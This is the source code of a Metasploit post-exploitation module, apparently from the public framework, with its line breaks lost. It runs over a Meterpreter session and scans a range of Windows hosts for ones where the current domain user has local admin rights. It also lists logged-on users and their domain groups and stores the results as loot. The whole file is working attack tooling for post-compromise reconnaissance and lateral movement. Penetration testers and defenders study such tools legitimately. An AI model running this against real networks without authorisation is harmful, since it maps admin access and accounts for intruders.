## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, 'Name' => 'Windows Gather Local Admin Search', 'Description' => %q{ This module will identify systems in a given range that the supplied domain user (should migrate into a user pid) has administrative access to by using the Windows API OpenSCManagerA to establishing a handle to the remote host. Additionally it can enumerate logged in users and group membership via Windows API NetWkstaUserEnum and NetUserGetGroups. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon McCann "zeknox" ', 'Thomas McCarthy "smilingraccoon" ', 'Royce Davis "r3dy" ' ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ] )) register_options( [ OptBool.new('ENUM_USERS', [ true, 'Enumerates logged on users.', true]), OptBool.new('ENUM_GROUPS', [ false, 'Enumerates groups for identified users.', true]), OptString.new('DOMAIN', [false, 'Domain to enumerate user\'s groups for']), OptString.new('DOMAIN_CONTROLLER', [false, 'Domain Controller to query groups']) ], self.class) end def setup super # This datastore option can be modified during runtime. # Saving it here so the modified value remains with this module. @domain_controller = datastore['DOMAIN_CONTROLLER'] if is_system? # running as SYSTEM and will not pass any network credentials print_error "Running as SYSTEM, module should be run with USER level rights" return else @adv = client.railgun.advapi32 # Get domain and domain controller if options left blank if datastore['DOMAIN'].nil? or datastore['DOMAIN'].empty? user = client.sys.config.getuid datastore['DOMAIN'] = user.split('\\')[0] end if @domain_controll.nil? and datastore['ENUM_GROUPS'] @dc_error = false # Uses DC which applied policy since it would be a DC this device normally talks to cmd = "gpresult /SCOPE COMPUTER" # If Vista/2008 or later add /R if (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) cmd << " /R" end res = cmd_exec("cmd.exe","/c #{cmd}") # Check if RSOP data exists, if not disable group check unless res =~ /does not have RSOP data./ dc_applied = /Group Policy was applied from:\s*(.*)\s*/.match(res) if dc_applied @domain_controller = dc_applied[1].strip else @dc_error = true print_error("Could not read RSOP data, will not enumerate users and groups. Manually specify DC.") end else @dc_error = true print_error("User never logged into device, will not enumerate users and groups. Manually specify DC.") end end end end # main control method def run_host(ip) connect(ip) end # http://msdn.microsoft.com/en-us/library/windows/desktop/aa370669(v=vs.85).aspx # enumerate logged in users def enum_users(host) userlist = Array.new begin # Connect to host and enumerate logged in users winsessions = client.railgun.netapi32.NetWkstaUserEnum("\\\\#{host}", 1, 4, -1, 4, 4, nil) rescue ::Exception => e print_error("Issue enumerating users on #{host}") return userlist end return userlist if winsessions.nil? count = winsessions['totalentries'] * 2 startmem = winsessions['bufptr'] base = 0 userlist = Array.new begin mem = client.railgun.memread(startmem, 8*count) rescue ::Exception => e print_error("Issue reading memory for #{host}") vprint_error(e.to_s) return userlist end # For each entry returned, get domain and name of logged in user begin count.times{|i| temp = {} userptr = mem[(base + 0),4].unpack("V*")[0] temp[:user] = client.railgun.memread(userptr,255).split("\0\0")[0].split("\0").join nameptr = mem[(base + 4),4].unpack("V*")[0] temp[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join # Ignore if empty or machine account unless temp[:user].empty? or temp[:user][-1, 1] == "$" # Check if enumerated user's domain matches supplied domain, if there was # an error, or if option disabled data = "" if datastore['DOMAIN'].upcase == temp[:domain].upcase and not @dc_error and datastore['ENUM_GROUPS'] data << " - Groups: #{enum_groups(temp[:user]).chomp(", ")}" end line = "\tLogged in user:\t#{temp[:domain]}\\#{temp[:user]}#{data}\n" # Write user and groups to notes database db_note(host, "#{temp[:domain]}\\#{temp[:user]}#{data}", "localadmin.user.loggedin") userlist << line unless userlist.include? line end base = base + 8 } rescue ::Exception => e print_error("Issue enumerating users on #{host}") vprint_error(e.backtrace) end return userlist end # http://msdn.microsoft.com/en-us/library/windows/desktop/aa370653(v=vs.85).aspx # Enumerate groups for identified users def enum_groups(user) grouplist = "" dc = "\\\\#{@domain_controller}" begin # Connect to DC and enumerate groups of user usergroups = client.railgun.netapi32.NetUserGetGroups(dc, user, 0, 4, -1, 4, 4) rescue ::Exception => e print_error("Issue connecting to DC, try manually setting domain and DC") vprint_error(e.to_s) return grouplist end count = usergroups['totalentries'] startmem = usergroups['bufptr'] base = 0 begin mem = client.railgun.memread(startmem, 8*count) rescue ::Exception => e print_error("Issue reading memory for groups for user #{user}") vprint_error(e.to_s) return grouplist end begin # For each entry returned, get group count.to_i.times{|i| temp = {} groupptr = mem[(base + 0),4].unpack("V*")[0] temp[:group] = client.railgun.memread(groupptr,255).split("\0\0")[0].split("\0").join # Add group to string to be returned grouplist << "#{temp[:group]}, " if (i % 5) == 2 grouplist <<"\n\t- " end base = base + 4 } rescue ::Exception => e print_error("Issue enumerating groups for user #{user}, check domain") vprint_error(e.backtrace) return grouplist end return grouplist.chomp("\n\t- ") end # http://msdn.microsoft.com/en-us/library/windows/desktop/ms684323(v=vs.85).aspx # method to connect to remote host using windows api def connect(host) if @adv.nil? return end user = client.sys.config.getuid # use railgun and OpenSCManagerA api to connect to remote host manag = @adv.OpenSCManagerA("\\\\#{host}", nil, 0xF003F) # SC_MANAGER_ALL_ACCESS if(manag["return"] != 0) # we have admin rights result = "#{host.ljust(16)} #{user} - Local admin found\n" # Run enumerate users on all hosts if option was set if datastore['ENUM_USERS'] enum_users(host).each {|i| result << i } end # close the handle if connection was made @adv.CloseServiceHandle(manag["return"]) # Append data to loot table within database print_good(result.chomp("\n")) unless result.nil? db_loot(host, user, "localadmin.user") else # we dont have admin rights print_error("#{host.ljust(16)} #{user} - No Local Admin rights") end end # Write to notes database def db_note(host, data, type) report_note( :type => type, :data => data, :host => host, :update => :unique_data ) end # Write to loot database def db_loot(host, user, type) p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user) vprint_status("User data stored in: #{p}") end end